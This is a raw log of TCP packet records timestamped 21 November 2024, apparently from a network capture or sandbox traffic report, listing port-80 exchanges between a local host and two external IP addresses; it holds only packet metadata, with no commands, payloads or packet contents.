                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.716043949 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.716088057 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.718179941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.718302965 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.718348026 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.720616102 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.720719099 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.720773935 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.720942974 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.720985889 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.722646952 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.722718954 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.722750902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.722783089 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.722803116 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.724891901 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.725138903 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.725182056 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.727128029 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.727241993 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.727297068 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.729497910 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.729573965 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.729626894 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.731636047 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.731729984 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.731781960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.733851910 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.733968973 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.734021902 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.736140013 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.736196041 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.736277103 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.738333941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.738390923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.738447905 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.740626097 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.740700960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.740704060 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.742815971 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.742861032 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.742882013 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.742922068 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.744680882 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.744740963 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.744815111 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.745156050 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.745248079 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.745316029 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.747308016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.747379065 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.747423887 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.749579906 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.749643087 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.749759912 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.750818014 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.751781940 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.751883984 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.751939058 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.754034042 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.754134893 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.754201889 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.756253004 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.756377935 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.756428957 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.758497953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.758630037 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.758680105 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.760754108 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.760812044 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.760863066 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.760915995 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.763025045 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.763102055 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.763108969 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.763158083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.825284004 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.825412989 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.825484037 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.827891111 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.828063011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.828111887 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.833132029 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.833164930 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.833211899 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.838238955 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.838526011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.838606119 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.843518019 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.843647957 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.843702078 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.846687078 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.846756935 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.846770048 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.846817970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.847246885 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.847330093 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.847377062 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.847433090 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.848742008 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.848877907 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.848923922 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.849522114 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.849579096 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.849587917 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.849637985 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.851119041 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.851186991 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.851222038 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.851280928 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859680891 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859739065 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859750032 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859775066 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859793901 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859877110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859927893 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859946966 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.859982014 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.860126972 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.860126972 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.860141039 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.865830898 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.866020918 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.866085052 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.869514942 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.869549990 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.869601965 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.874748945 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.874815941 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.874875069 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.879846096 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.879997969 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.880052090 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883405924 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883492947 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883517027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883574963 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883692026 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883897066 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.883946896 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.884305954 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.884366989 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.884418011 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.884473085 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.885674953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.885745049 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.885788918 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.885848045 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887471914 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887535095 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887562037 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887598991 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887615919 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887669086 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.887718916 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.889549017 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.889627934 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.889760971 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.889920950 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891052008 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891118050 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891165018 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891220093 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891386032 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891454935 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.891495943 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.892784119 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.892838955 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.892884970 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.892936945 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.894479990 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.894542933 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.894625902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.894675970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.895380974 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.895505905 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.895600080 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.896586895 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.896647930 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.896672010 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.896719933 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.898118019 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.898184061 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.898215055 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.898263931 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899070978 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899172068 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899223089 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899854898 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899904966 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.899990082 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.900038004 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.901673079 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.901722908 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.901842117 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.901892900 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.902919054 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903043032 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903090954 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903408051 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903450966 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903486967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.903532982 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.905217886 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.905268908 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.905308008 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.905356884 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.906771898 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.906929016 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.906972885 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.907015085 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.907064915 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.907114983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.907161951 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.908782959 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.908843040 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.908971071 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.909022093 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.910547972 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.910624981 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.910664082 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.910708904 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.912350893 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.912408113 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.912516117 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.912559986 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.914156914 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.914252996 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.914393902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.914442062 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.915831089 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.915887117 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.915925026 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.915968895 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.917591095 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.917645931 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.917738914 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.917784929 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.919394016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.919445038 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.919497967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.919547081 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.921164989 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.921212912 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.921279907 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.921324015 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.922975063 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.923022985 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.923182964 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.923227072 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.924746990 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.924793005 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.924837112 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.924885988 CET4980280192.168.2.4185.215.113.16
